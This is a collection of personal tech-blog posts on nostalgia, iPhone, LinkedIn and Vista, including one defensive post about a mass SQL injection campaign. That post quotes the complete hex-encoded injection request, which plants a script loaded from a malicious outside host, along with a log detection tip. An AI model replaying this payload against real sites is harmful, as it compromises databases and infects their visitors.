Now and then I think back to an old song, a not-quite-as-old television commercial, and a little league baseball "career" that happened years before. In each of our lives there's that song, that toy, that event, or what have you - Something from our past that somehow pulls us back, and returns our minds directly into a piece of our past that has some real meaning.

For me, one of those timeless reminders is a song and a Pizza Hut commercial from the early 90's. I recall seeing the commercial on TV, and it's on the old VHS video tape of the first Teenage Mutant Ninja Turtles movie. The song is called "Right Field," and it was originally performed by Peter, Paul and Mary (here's an iTunes link for ya). I'm not sure who's singing in the Pizza Hut commercial, but the combination of the visuals and the music is priceless, and it just takes me back.

I think when I was much younger, I even looked a bit like that kid. Maybe a somewhat skinnier head, but close. Watching that commercial truly takes me back. I wasn't a great baseball player by any stretch of the imagination, but I truly enjoyed the game. I remember taking a couple fast pitches to the face, and standing in right (or left, or center) field, the ball high in the air and coming down at me. I was always at least a little amazed when it landed in my glove. I remember my best friends with me on the team and out on the field. The cottonwood fluff floating in the air, just like in the commercial. Lots of rubber bands, oil and a ball wrapped in a new glove, crammed under the truck tire overnight. And I remember, quite clearly, our dads (who were also our coaches) taking us to -- you guessed it -- the local Pizza Hut after games, where we pigged out (that's the term we used back then), belched a lot of soda bubbles, and generally had a great time. I remember playing Space Invaders and Asteroids and Missile Command on the table games there when they were brand new.

Years later as an adult, when the Pizza hut commercial was created I remember watching it with a couple of my foster sons. It was baseball season for them, and they loved it as much as I did. Of course, the fact that it was on the beginning of the Teenage Mutant Ninja Turtles video tape helped (since they loved that, too). I was helping coach by then. When the kids weren't around, I sometimes played the commercial over and over a few times. I know it sounds weird, but like I said - Each of us has those little things that truly take us back.

A lot of people don't realize the original song is one of many great songs by Peter, Paul and Mary. I have no idea who recorded the actual music used in the commercial spot. Many people also often don't realize there are additional verses. The final verse and chorus, with a minor modification, if what they used in the commercial. That's my favorite part, but the whole song is great and I think anyone who's a fan of the song would like to hear it or read the lyrics. Here's an iTunes link. The original lyrics appear below, and I've added a bonus YouTube link -- video of PP&M performing the original song.

Saturday summers, when I was a kid
We'd run to the schoolyard and here's what we did
We'd pick out the captains and we'd choose up the teams
It was always a measure of my self esteem
'Cuz the fastest, the strongest, played shortstop and first
The last ones they picked were the worst
I never needed to ask, it was sealed,
I just took up my place in right field.
Playing...

Right field, its easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow

Playing right field can be lonely and dull
Little leagues never have lefties that pull
I'd dream of the day they'd hit one my way
They never did, but still I would pray
That I'd make a fantastic catch on the run
And not lose the ball in the sun
And then I'd awake from this long reverie
And pray that the ball never came out to me
Here in...

Right field, its easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow

Off in the distance, the game's dragging on,
There's strikes on the batter, some runners are on.
I don't know the inning, I've forgotten the score.
The whole team is yelling and I don't know what for.
Then suddenly everyone's looking at me
My mind has been wandering; what could it be?
They point at the sky and I look up above
And a baseball falls into my glove!

Here in right field, its important you know.
You gotta know how to catch
You gotta know how to throw
That's why I'm here in right field
Just watching the dandelions grow!

A simpler time, not a worry in the world. Just a ball, a bat, a group of kids, a field and a few dandelions to distract some of us. We may never get back there in real life, but it's fun to revisit it from time to time in our minds.

I'm also reminded, strangely enough, of something that happened many years later. Several years ago I was in a conference room with my IT team, assembled as a panel to interview a candidate for a position on our IT help desk. We'd asked the common technical and background questions of the candidate, whose name was Aaron. We then threw a couple behavioral questions at him, including the classic, "Why are manhole covers round?" A semi-blank look came over Aaron's face, and after several moments he blurted out his answer: "Because Teenage Mutant Ninja Turtles like pizza???" I turned to the guy next to me and declared, "He's the guy." We hired him the next day. His other interview questions and excellent answers had a lot to do with that decision, but the pizza answer was really what made it stick for me. Anyone can answer technical questions. That answer was a classic. And for the record, he turned out to be a great hire, too.

Whether it's a song like "Right Field" or a movie ("Stand by Me" comes to mind) or something else, each of us has our memory triggers. I'm just glad YouTube has that old commercial online, so I don't have to buy a VHS player just to load up this old TMNT video tape that I still have on my shelf. I'm not even sure if it would play anymore, but one thing's for sure: I won't be getting rid of that old tape any time soon.

LinkedIn has started sending owners of certain LinkedIn Groups email letting them know that on Friday they'll be enabling a new discussions capability for group managers and members. A friend received the information for his LinkedIn group today, but I have not yet received it for the one I co-manage, PDX Tech. So, it's not clear whether this is rolling out to all groups or just some.

The addition of this new Groups functionality is a great move. To date, people who manage LinkedIn groups have had very limited options in terms of how to enable networking and communication among their groups. One can manually export a delimited-text file in a few formats to let you send emails, but outside of that the group interaction model has been short-featured, and required use of outside services - a sloppy model at best.

In addition to the group discussions, they plan to release an enhanced, searchable membership roster capability. Earlier this summer they introduced a searchable Groups directory. Positive changes appear to be happening.

Below are the details from the LinkedIn email.

Dear #####,

First, thank you for managing your group on LinkedIn. We sincerely appreciate the time and effort you devote to your members, and we know they value it. Together you have made Groups one of the top features on LinkedIn.

This Friday, we will be adding several much-requested features to your group:

• Discussion forums: Simple discussion spaces for you and your members. (You can turn discussions off in your management control panel if you like.)
• Enhanced roster: Searchable list of group members.
• Digest emails: Daily or weekly digests of new discussion topics which your members may choose to receive. (We will be turning digests on for all current group members soon, and prompting them to set to their own preference.)
• Group home page: A private space for your members on LinkedIn.

We're confident that these new features will spur communication, promote collaboration, and make your group more valuable to you and your members. We hope you can come by LinkedIn on Friday morning to check out the new functionality and get a group discussion going by posting a welcome message.

Sincerely,
The LinkedIn Groups Team

A couple of small, independent evaluations of the iPhone 3G's performance, which has been much maligned by many of it's customers (including me from time to time), have been published in the past day or so. The results are interesting to consider, especially side-by-side.

In the first test, Swedish tech site GP took their iPhone 3G to a super-fancy antenna test chamber at a company called Bluetest, where they ran the iPhone through the highly technical paces along with a few other 3G phones for comparison purposes. Results are available on the GP site.

In the second test, Wired asked readers to participate in testing from the field, where they gathered and submitted speed and other connectivity data with their own phones. Wired then analyzed, mapped and posted the results as well as the test data in complete raw format at their site.

In the end, what did the tests yield? Well, you should read them for yourself and draw your own conclusions, of course. But in a nutshell, here's my take on what they found:

• GP's antenna test found that the iPhone 3G's antenna performs as well as any of the other 3G phones tested.
• The Wired real-world network test found that the networks are often woefully underperforming, and that while speeds are typically faster than EDGE, the ability to connect to a 3G tower might be problematic at best.

So, does this mean Apple-provided software fixes may not be able to solve the iPhone's 3G woes? It seems that in the case of network performance where the number of "bars" showing on 3G is at the bottom of the scale yet a EDGE network has a strong signal, trading off could be done better by the phone. But what really needs to happen to solve the big-picture problem is better 3G coverage. My experience in several cities has been that 3G coverage is poor in many cases, and inconsistent at best. In fact, if the AT&T EDGE/2.5G network was not available as a fall-back (or maybe "call-back" is a better term, given the dropped call rate), AT&T would never be able to sell their service. The effective 3G network coverage just isn't good enough to stand on its own. And poor coverage combined with all those handoffs and network drops just mean more and more battery power being applied by the device to keep re-establishing it's 3G connectivity.

However, any software fixes for lockups, freezing and app crashes will require Apple taking action. One thing I've wondered lately: Are device/software hangs and crashes causing or somehow related to network connectivity issues? Could one be causing the other, at least part of the time? I have noticed locking/hanging in several apps while the iPhone tries to connect to the AT&T network (as evidenced by the simultaneous flurry of AT&T radio-speaker-dance noise that we've all become familiar with over the past several years).

I like to listen to my Pandora "stations" in the background while working on my laptop. I get frustrated when I accidentally close the web browser (often its in a hidden tab) or, even worse, click on a link soewhere and Safari, in all it's awesomeness and wisdomness, re-uses the window and kills the audio feed.

In hopes of finding a better way, I started searching for a Pandora widget for the Mac Dashboard (the layover-page that you can put any of a number of downloadable mini-apps on). Unfortunately, I didn't find anything. (Update - turns out there is a widget out there, but it's a memory hog and apparently has a few issues). So, rather than looking for someone else to do the work for me, I started to actually think about a solution I could build on my own.

After about 10 minutes, I remembered the nifty capability in Safari to define a "snipped" portion of a web page and make it a Widget on the OSX Dashboard. You use the little scissors icon in Safari to accomplish this. I started thinking about the Dashboard and how it works, and wondered if there was any way to have Pandora play in the background using a system (the Dashboard, that is) that appears to reload each app every time I launch it.

What the heck, worth a shot, right? Well, I found I could create a web-clip of Pandora's music player that would play my music. No big surprise there. Click on the image to see the widget full-size.

But when I exited the dashboard to go do some actual work, the music would quit.

Bummer.

I got curious though. Maybe someone had thought about the fact that web pages constantly change and play music and whatever else. I did the obvious: I clicked on the little (i) button in the lower right corner of the widget and it took me to the page where I can choose to make the widget look like it's torn from a piece of paper, or whatever. And, lo and behold, right there in the lower left, is a box that makes it appear you can uncheck it and make the audio play in the background, even when dashboard is not active. I've highlighted that box below.

Would it work? I unchecked the box, exited Dashboard, and the music kept on playing in the background. Problem solved! It turns out the default setting is to play web page audio only when Dashboard is active, so you have to toggle the setting to get what you want.

Any other ways to do this? My method works great, but I wonder if someone else came up with a different solution?

Boy Genius says iPhone software v2.0.2 is on it's way out the door this afternoon. In fact, I just checked in iTunes, and there it is.

All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.

Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of ourward appearance and functionality.

I just made a change on the blog, so my main RSS feed links now point to FeedBurner. You should not need to do anything to use the new feed - it's automagical. As a result of this change, some people might see duplicates of past entries. It's a one-time change (I hope), so thanks for putting up with it.

If you happen to subscribe to the feed for any single posting category here, that feed URL is unchanged.

My knowledge and social integrity was called into question this evening (in an instant messaging group chat session) about a rule-related fact I declared to be true based on the Rules of Jinx. I've always considered the rules to be pretty straight forward, and we all know they are unflinchingly rigid, but I'm willing to accept that evidence is the best proof when someone questions you.

And what better evidence than an encyclopedia of "facts" made up by pretty much anyone who says they know what they're talking about? I went to Wikipedia, and the entry there about the rules of Jinx. I'm posting a portion of it here for easy future reference.

A jinx can be initiated when at least two people in casual conversation unintentionally say (or type, in the case of Internet jinx) the same word or phrase at the same time. If one of them (the "jinxer") yells "Jinx!" before any further conversation has begun, the other person (the "jinxee") is in a state of being "jinxed" and may not speak further until they are "released" from the jinx. The rules for what constitutes such a release vary. Traditionally, a jinx is ended when anyone speaks the jinxed person's name. However, a common variation says that only the jinxer can free the jinxee from their obligation to remain silent. (This is sometimes called a "private jinx" or "jinx personal lock".)

The game ends when either the jinxee is released from the jinx or when the jinxee "breaks" the jinx by speaking while in a state of being jinxed. In the latter case, the Jinxee loses the game and a penalty is exacted.

Simultaneous speaking that is planned or expected, such as during the recitation of the Pledge of Allegiance or during the singing of a song, is ineligible for a jinx to occur. A jinx may only follow a spontaneous and unexpected overlapping of conversation by both parties.

See the wikipedia article for penalties, variations and details about the Jinx Sequence.

Okay. Back to your regularly scheduled programming, already in progress...

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.

There are a lot of so-so iPhone apps out there, fun to use once or twice but not killer applications that you simply must have. DataCase is a candidate for that latter classification. (Available via the app store for iPhone and iPod Touch, $6.99)

The DataCase app allows you to copy files from your PC or Mac to the iPhone via the wireless network using a drag-and-drop method. Once on the iPhone you can view and use the files in mobile mode. There's support for MS Office formats, PDF, text, common images, HTML, plus any audio and video the iPhone OS would normally support.

It's pretty slick. I'm playing with it now and can see the real benefits of having a variety of key files, documents, etc. available on the mobile device any time I need them. One problem common to all iPhone apps is the fact that it has to be running in the foreground in order to access the app remotely - no background execution. Good thing I bought this 16GB iPhone eh?

Links: Veiosoft web site and a review at TUAW.

I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.

Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.

That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.

So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!

Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they becomes something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.

That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.

I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for your to hear, and you can fine tune as you go.

Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.

I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.

Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)

On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).

My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.

Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:

5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen

The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."

You should listen to your online friends. They often have great ideas, like in this case. I was recently turned onto a simple but effective alternative to bulky plastic cases and leather holsters for my new iPhone 3G. It's called the invisible SHIELD . The product, simply put, is pretty darned terrific. You hardly know it's there, and it protects like crazy. You can also get invisibleSHIELD for the iPhone first-generation device.

Now, let me tell you right up front that when it comes time to "install" the shield on your phone, you'll need a clean work surface, a little patience, 12 to 24 hours to let your shield "cure" on the phone,  and the ability to read and follow some simple instructions. If you make sure you have those few key things taken care of, all will go well.

In the video below I show and abuse my iPhone 3G (the only one I own...) with an Invisible Shield installed. In the video you can see that there are a couple scratches under the shield. Those came from a combination of iPhone and the keys in my pocket (before I ordered the invisibleSHIELD . In fact it was those exact scratches, which I got the first day I had the phone, that prompted me to find a real, working anti-scratching solution.



I can highly recommend the Invisible Shield.

Full disclosure: Zagg (the manufacturer of the invisibleSHIELD ) doesn't know I am doing this review. I found their product all on my own based on a real need, and clicking on the advertisement below takes you to my link on their product site - If you buy something there I'll get a small chunk of the change you spend. If you don't like that idea, no problem - just go to zagg.com and click through to the iPhone 3G page (or whatever product you want to cover and protect - For me, my MacBook Air is next).

  

I especially appreciated the Mojave Experiment that Microsoft recently shared with the world (where Vista-negative opinions were tested with a "new" version of Windows, code-named Mojave; it was then revealed to the participants after seeing the new version that what they were looking at was actually Vista). I've been using Vista since well before I came onto the market, and I can hardly stand to use WIndows XP computers anymore. Anyhow, check out http://www.mojaveexperiment.com if you haven't seen it, especially if you have a negative opinion of Vista today based on what you've heard from others. (Note: Scientifically speaking, the "experiment" would be badly flawed, but it's a marketing campaign and in that light it's pretty darned smart if you ask me. Plus, I've lost track of how may people who, never having seen Vista yet having a negative perception, decided to upgrade after trying for a couple hours (on my laptop) at my suggestion. With SP1 installed, for the record. Seriously, group think and manipulation goes both directions).

For those of us who are using Vista (or any other OS for that matter), it's nice to be able to fine-tune a computer system so it will perform the way we want it to. For Vista, Microsoft has released a document called Windows Vista Performance and Tuning as part of their Springboard series, which lets users know about a number of tweaks and decisions they can make to make the OS work well for their needs. It also effectively spells out in fairly plain language some relatively complex information.

Windows Vista and SP1 focus on delivering greater performance and overall system responsiveness. By striking a balance between speed and responsiveness, Windows Vista and SP1 deliver a level of performance that has the greatest positive impact on the system’s usability.This guide looks at the following areas of performance improvement:

• Making configuration changes that help a computer feel more responsive when you use it.
• Using hardware to boost the actual physical speed of a computer.
• Making configuration changes that help a computer to start faster.
• Making the computer more reliable may help increase performance.
• Monitoring performance occasionally so that you can stop problems before they get too big.

There are a variety of other guides out there as well, but this one hits a number of important nails on the head that the average computer user can easily understand and use.

Last week we published an interview that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.

We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.

RunAs Radio, Show 67 - Simon Goldstein on IT Risk Management (38 minutes)

Note: You can find all our podcast feeds in the table here, and you can also subscribe to get the show every week in iTunes by clicking here.